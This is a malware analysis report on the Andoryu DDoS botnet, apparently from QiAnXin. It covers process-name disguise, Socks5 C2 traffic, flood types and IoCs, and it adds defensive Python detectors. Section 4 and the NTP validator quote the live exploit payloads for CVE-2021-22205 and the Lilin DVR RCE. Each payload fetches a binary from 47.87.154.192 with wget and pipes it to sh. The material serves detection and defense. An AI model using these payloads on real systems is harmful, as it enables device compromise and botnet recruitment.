1. Overview
In early February 2023, the Threat Monitoring System of QiAnXin Threat Intelligence Center found a malware family propagating by exploiting the CVE-2021-22205 vulnerability. Through analysis it can be confirmed that the malware does not belong to any known botnet family.
We refer to this new botnet as “Andoryu Botnet”, following the name used by its creator. The botnet malware communicates with its C2 server via the Socks5 protocol.
The recent spreading trend of Andoryu Botnet is as follows. From the activity timeline, we found that Andoryu Botnet only spreads around the time of each update and only in a small area, which indicates that the botnet is still under development.
2. Analysis of Behaviors
This article uses the x86-64 version of Andoryu Botnet as the example for analysis; the sample information is as follows:
File name | File Size | MD5
---|---|---
Andoryu.x86 | 42208 bytes | D203E1BB0BA3E8385FF9E1F83C10EB2D
2.1 Check of Startup Parameters
The first thing Andoryu does is check its startup parameters. When a parameter is supplied, the malware runs normally.
2.2 String Encryption
Most of the important strings used by the malware are encrypted; a single function decrypts them in bulk at an early stage of execution.
2.3 Process Name Disguise
It uses the prctl function to change the process name to “/bin/bash”.
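A renamed process leaves a trace a defender can check for: the kernel derives the comm name from the executable's basename at execve(), so a comm such as "/bin/bash" (containing a path separator) or one that disagrees with /proc/<pid>/exe can only have been set afterwards. The following script is an added detection example, not code from the report; the sample rows and the path /tmp/andoryu_sample are constructed placeholders.

```python
import os

# Constructed sample rows in the shape of /proc/<pid>/comm and /proc/<pid>/exe.
# Row 1003 mimics a binary that renamed itself to "/bin/bash" through prctl;
# the path /tmp/andoryu_sample is a placeholder, not a path from the report.
SAMPLE_PROCESSES = [
    {"pid": 1001, "comm": "bash", "exe": "/bin/bash"},
    {"pid": 1002, "comm": "python3", "exe": "/usr/bin/python3.11"},
    {"pid": 1003, "comm": "/bin/bash", "exe": "/tmp/andoryu_sample"},
]

TASK_COMM_LEN = 15  # the kernel keeps at most 15 bytes of comm (plus NUL)


def inspect_process(comm, exe):
    """Return the reasons why this comm/exe pair looks disguised (empty if none).

    A comm containing '/' is a strong signal: execve() sets comm to a basename,
    so a slash can only come from a later rename such as prctl(PR_SET_NAME).
    A comm that differs from the exe basename is a weaker signal, because
    interpreters invoked through a symlink (python3 -> python3.11) do this
    legitimately; it is reported separately so the caller can weigh it.
    """
    reasons = []
    if "/" in comm:
        reasons.append("comm contains a path separator, which execve() never produces")
    expected = os.path.basename(exe)[:TASK_COMM_LEN]
    if comm != expected:
        reasons.append(f"comm {comm!r} does not match exe basename {expected!r}")
    return reasons


def find_disguised(processes):
    """Keep only the processes that carry the strong path-separator signal."""
    hits = []
    for proc in processes:
        reasons = inspect_process(proc["comm"], proc["exe"])
        if any("path separator" in r for r in reasons):
            hits.append({"pid": proc["pid"], "reasons": reasons})
    return hits


def read_proc():
    """Collect comm and exe for every readable process on a live Linux host."""
    rows = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/comm") as fh:
                comm = fh.read().rstrip("\n")
            exe = os.readlink(f"/proc/{entry}/exe")
        except OSError:
            continue  # kernel thread, process already exited, or no permission
        rows.append({"pid": int(entry), "comm": comm, "exe": exe})
    return rows


if __name__ == "__main__":
    for hit in find_disguised(SAMPLE_PROCESSES):
        print(hit)
    if os.path.isdir("/proc"):
        for hit in find_disguised(read_proc()):
            print(hit)
```

Run as root to cover processes owned by other users; unreadable entries are skipped rather than reported, so a clean result on an unprivileged run is not a clean host.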
2.4 Printing Botnet Information
The decrypted strings contain the botnet information, which is printed to the console when the malware runs.
This is why we call the botnet Andoryu Botnet; the printed information also shows that the creator tested the malware on December 30, 2022.
3. Socks5 Communication
3.1 Communication Process
The botnet communicates with its C2 server through the Socks protocol; the specific communication process is as follows:
(1) Firstly, it connects to the hard-coded proxy server at the address "152.67.66.37:1080".
(2) After the TCP three-way handshake with the proxy server completes, it starts Socks5 authentication negotiation. The Socks5 proxy uses no username/password authentication.
(3) Then the malware tells the proxy server the address of the remote server to be accessed. This address is also obtained when the strings are decrypted in bulk. (DST_C2 = "172.86.123.20:1025")
(4) Next it starts Socks communication and sends a beacon packet which includes the local IP information of the infected host.
(5) The malware receives commands from the C2 server via the proxy.
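Because the bot's TCP connection only ever goes to the proxy, the real C2 address appears on the wire solely inside the Socks5 CONNECT request. The parser below is an added example (not from the report) that walks the client-to-proxy side of a reassembled stream, checks which authentication methods were offered, and extracts the destination plus the first bytes tunnelled to it. The sample stream is constructed to match the exchange described above; the beacon content is a placeholder.

```python
import ipaddress
import struct

SOCKS_VERSION = 0x05
METHOD_NAMES = {0x00: "no authentication", 0x02: "username/password"}
CMD_NAMES = {0x01: "CONNECT", 0x02: "BIND", 0x03: "UDP ASSOCIATE"}
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04


def parse_greeting(data):
    """Client greeting: VER | NMETHODS | METHODS. Returns (info, remaining bytes)."""
    if len(data) < 2 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 greeting")
    n = data[1]
    if len(data) < 2 + n:
        raise ValueError("truncated greeting")
    methods = [METHOD_NAMES.get(m, f"0x{m:02x}") for m in data[2:2 + n]]
    return {"methods": methods}, data[2 + n:]


def parse_request(data):
    """Client request: VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT."""
    if len(data) < 4 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 request")
    cmd, atyp = data[1], data[3]
    off = 4
    if atyp == ATYP_IPV4:
        host = str(ipaddress.IPv4Address(bytes(data[off:off + 4])))
        off += 4
    elif atyp == ATYP_DOMAIN:
        length = data[off]
        host = bytes(data[off + 1:off + 1 + length]).decode("ascii", "replace")
        off += 1 + length
    elif atyp == ATYP_IPV6:
        host = str(ipaddress.IPv6Address(bytes(data[off:off + 16])))
        off += 16
    else:
        raise ValueError(f"unknown ATYP 0x{atyp:02x}")
    if len(data) < off + 2:
        raise ValueError("truncated request")
    port = struct.unpack("!H", data[off:off + 2])[0]
    off += 2
    info = {"command": CMD_NAMES.get(cmd, f"0x{cmd:02x}"), "host": host, "port": port}
    return info, data[off:]


def extract_c2(client_stream):
    """Reassembled client->proxy bytes in; real destination and first payload out."""
    greeting, rest = parse_greeting(client_stream)
    request, payload = parse_request(rest)
    return {"auth_methods": greeting["methods"], **request, "first_payload": bytes(payload)}


# Constructed client side of the exchange: a greeting offering only
# "no authentication", a CONNECT to 172.86.123.20:1025, then the first bytes
# sent through the tunnel (placeholder content standing in for the beacon).
SAMPLE_STREAM = (
    b"\x05\x01\x00"
    + b"\x05\x01\x00\x01" + bytes([172, 86, 123, 20]) + (1025).to_bytes(2, "big")
    + b"<constructed beacon bytes>"
)

if __name__ == "__main__":
    print(extract_c2(SAMPLE_STREAM))
```

In a real capture the proxy's replies (method selection and the CONNECT response) sit between the two client messages; feed this parser only the client direction of the reassembled TCP stream. A CONNECT from an unexpected host to a hard-coded proxy, carrying an IP literal rather than a domain, is the pattern to alert on.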
QiAnXin Threat Intelligence Center has been monitoring the downstream data, but the attacker has not sent any DDoS attack instruction yet. We will continue to trace Andoryu Botnet and report its latest activity.
3.2 DDoS Methods
AndoryuBot supports a variety of DDoS methods, as follows:
Name | Description
---|---
icmp-echo | ICMP Flood
udp-ovh | UDP Flood for OVH
udp-game | UDP Game Flood
udp-plain | UDP Plain Flood
tcp-raw | TCP Flood
tcp-socket | TCP Syn Flood
tcp-handshake | TCP Flood
4. Update and Dissemination
Through correlation analysis of the discovered samples, updates to Andoryu Botnet began in December 2022, and two updates have been seen in the malware since then. Its creator did not modify the time string printed to the console; the updates mainly concerned the remote server address (DST_C2) and the supported architectures. The CPU architectures supported by the latest version of AndoryuBot are as follows.
- Arm
- Mips
- M68K
- SuperH
- Sparc
- x86
Andoryu Botnet spreads through the Lilin DVR RCE as well as CVE-2021-22205, and the payloads observed this time are as follows.
CVE-2021-22205:
P(metadata
.(Copyright "\" . qx{TF=$(mktemp -u);mkfifo $TF && rm -rf Andoryu.10wget;wget http://47.87.154.192/Andoryu.x86 -O Andoryu.10wget;chmod 777 Andoryu.10wget;./Andoryu.10wget gitlab.x86;rm -rf Andoryu.10wget;<$TF | sh 1>$TF} . \" b ") )
Lilin DVR RCE:
User-Agent: Abcd
<?xml version="1.0" encoding="UTF-8"?><DVR Platform="Hi3520"><SetConfiguration File="service.xml"><![CDATA[<?xml version="1.0" encoding="UTF-8"?><DVR Platform="Hi3520"><Service><NTP Enable="True" Interval="20000" Server="time.nist.gov&cd /tmp;wget -O- http://47.87.154.192/lillin|sh;echo DONE"/></Service></DVR>]]></SetConfiguration></DVR>
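The Lilin DVR request above works because the NTP Server attribute is passed to a shell unchecked. A device, a WAF, or an IDS in front of it can reject the request by validating that attribute as a hostname or IP literal. The checker below is an added example, not the report's or the vendor's code. It deliberately extracts the attribute with a regex rather than an XML parser: the injected "&cd /tmp;" is not a valid entity reference, so a strict parser rejects the inner document before the attribute can be examined. The first sample is the request body quoted above, unchanged; the benign body is constructed.

```python
import ipaddress
import re

# Characters that have no place in a hostname but do drive a shell.
SHELL_METACHARS = set("&;|`$()<>\n ")

# RFC 1123 label: alphanumerics and hyphens, no leading or trailing hyphen.
LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")

# Pull every NTP Server attribute out of the raw body; a regex is used on
# purpose because the injected "&" makes the inner document malformed XML.
NTP_SERVER_RE = re.compile(r'<NTP\b[^>]*?\bServer="([^"]*)"')


def is_valid_host(value):
    """True if value is an IP literal or an RFC 1123 hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    if not value or len(value) > 253:
        return False
    return all(LABEL_RE.match(label) for label in value.rstrip(".").split("."))


def check_ntp_server(value):
    """Return the findings for one Server attribute value (empty if clean)."""
    findings = []
    bad = sorted(c for c in set(value) if c in SHELL_METACHARS)
    if bad:
        findings.append("shell metacharacters: " + repr("".join(bad)))
    if not is_valid_host(value):
        findings.append("not a valid hostname or IP literal")
    return findings


def inspect_setconfiguration(body):
    """Scan a SetConfiguration request body; returns (value, findings) pairs."""
    results = []
    for value in NTP_SERVER_RE.findall(body):
        findings = check_ntp_server(value)
        if findings:
            results.append((value, findings))
    return results


# The Lilin DVR request body quoted in the report, unchanged.
REPORTED_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?><DVR Platform="Hi3520">'
    '<SetConfiguration File="service.xml"><![CDATA[<?xml version="1.0" encoding="UTF-8"?>'
    '<DVR Platform="Hi3520"><Service><NTP Enable="True" Interval="20000" '
    'Server="time.nist.gov&cd /tmp;wget -O- http://47.87.154.192/lillin|sh;echo DONE"/>'
    '</Service></DVR>]]></SetConfiguration></DVR>'
)

# Constructed benign counterpart with an ordinary NTP server value.
BENIGN_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?><DVR Platform="Hi3520">'
    '<SetConfiguration File="service.xml"><![CDATA[<?xml version="1.0" encoding="UTF-8"?>'
    '<DVR Platform="Hi3520"><Service><NTP Enable="True" Interval="20000" '
    'Server="time.nist.gov"/></Service></DVR>]]></SetConfiguration></DVR>'
)

if __name__ == "__main__":
    print("reported:", inspect_setconfiguration(REPORTED_BODY))
    print("benign:  ", inspect_setconfiguration(BENIGN_BODY))
```

The hostname check is the one that matters on the device side: rejecting anything that is not a syntactically valid host removes the injection surface regardless of which metacharacter an attacker picks. The metacharacter list is reported alongside it only to make alerts readable.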
5. IoCs
MD5:
D203E1BB0BA3E8385FF9E1F83C10EB2D
28F10E60D05018E6D28B79F0976A8542
F9018E4401116435DCFE2DC9D14D0FD5
2BABAF24B23872749EEC1452D7E7C0F3
ABD2496C3B703BD722386A848CC0BC12
6335ECB85ED6C6FCCF71FD841939BEC4
70A568C47785A8C58AA1D755EFE0E39E
FFE05160D769F441EF4A67271F9E614C
BB7DECCC2F6CEB2D5A5C7F5A05A4BBB1
0A1B14C2B8A453323841431FA44D0E32
C9CE8E0A1B13CBB6719133AFE5988CA7
C&C:
152.67.66.37:1080
172.86.123.20:1025
104.234.239.190:1025